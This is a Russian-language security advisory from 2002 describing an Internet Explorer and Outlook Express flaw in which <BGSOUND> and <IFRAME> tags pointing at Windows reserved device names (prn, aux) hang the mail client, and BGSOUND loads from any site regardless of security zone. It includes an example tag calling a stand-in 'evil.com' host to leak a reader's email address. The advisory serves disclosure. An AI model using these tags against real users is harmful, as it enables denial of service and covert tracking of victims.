Доступ к специальным устройствам в Internet Explorer

Дата публикации:
15.05.2002
Дата изменения:
17.10.2006
Всего просмотров:
738
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание:

Во всех версиях Windows есть зарезервированные имена файлов, которые относятся к специальным устройствам (называемые так же DOS-устройства), такие как prn, aux, nul и т.д. Имя устройства не зависит от пути к каталогу, расширения файла и т.д. (т.е. c:\temp\prn.tmp является специальным устройством prn). Для работы со специальными устройствами применяется тот же API что и для работы с обычными файлами. Несанкционированный доступ к специальным устройствам может привести к различным неприятным последствиям начиная с некорректной работы службы или программы, производящей попытку доступа к файлу и заканчивая повреждением физического устройства или компрометацией важных данных.

Описание проблемы:

ERRor обнаружил, что с помощью тэга <BGSOUND> в сочетании со специальным именем устройства можно вызвать зависание Outlook Express. При этом возвращение программы в рабочее состояние без потери архива писем является нетривиальной задачей.

Во время исследования этой проблемы было выявлено, что с помощью тэга <IFRAME> можно послать любые данные в специальное устройство.

Так же, проблемой является то, что исходный файл тэга <BGSOUND> загружается всегда и слюбого сайта независимо от установок зоны безопасности. Это делает возможным "регистрацию" клиента с помощью <bgsound src="http://evil.com/registerme?email=victim@com.com"> Проблема получения сведений о клиенте обсуждается в [4].

Производитель:

Microsoft был проинформирован ?? апреля 2002 года. Не было получено сообщений по данной проблеме с 25 апреля.  



Ссылки: http://www.security.nnov.ru/files/iedos/print.eml
http://www.security.nnov.ru/files/iedos/dos.eml
или введите имя

CAPTCHA